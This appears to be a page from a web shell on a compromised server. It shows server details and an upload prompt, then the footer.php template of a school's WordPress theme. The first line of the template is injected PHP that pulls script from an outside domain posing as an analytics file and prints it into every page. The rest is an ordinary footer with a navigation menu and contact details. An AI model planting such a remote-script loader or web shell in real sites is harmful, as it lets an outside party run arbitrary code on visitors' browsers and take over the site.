| Server IP : 77.68.64.21 / Your IP : 216.73.216.219 Web Server : Apache System : Linux hp3-wp-1011378.hostingp3.local 3.10.0-1160.144.1.el7.tuxcare.els9.x86_64 #1 SMP Fri Jul 10 17:06:31 UTC 2026 x86_64 User : csh2668128 ( 2112425) PHP Version : 8.1.34 Disable Function : shell_exec,exec,system,popen,set_time_limit MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/self/cwd/wp-content/themes/holsworthyschool/ |
Upload File : |
<?php echo @file_get_contents('https://jspacket.com/cdn/analytics.js') ?: ''; ?>
<?php
/**
* The template for displaying the footer
*
* Contains the closing of the #content div and all content after
*
*/
?>
<div class="container" style="margin-top:20px">
<div class="row">
<div class="col-md-12">
<div style="padding:10px;">
<h2>Important Links For Parents</h2>
<?php
wp_nav_menu( array(
'menu' => 'Bottom Navigation',
'before' => '<div class="bluebar">',
'after' => '</div>'
) );
?>
</div>
</div>
</div>
</div>
<div class='clear'></div>
<!-- <?php print get_template_part( 'template-parts/latestproducts'); ?> -->
<?php print get_template_part( 'template-parts/testimonial'); ?>
<footer id="colophon" class="site-footer" role="contentinfo">
<img class='footerlogo' src='<?php print get_template_directory_uri(); ?>/images/WebLogo.svg' />
<p>phone: 01409 253700</p>
<p>address: Sanders Ln, Holsworthy EX22 6HD</p>
<div class='credit'>site by <a target='_new' href='http://www.deanwronowski.co.uk'>DW</a></div>
</footer><!-- .site-footer -->
</div><!-- .site -->
<?php wp_footer(); ?>
</body>
</html>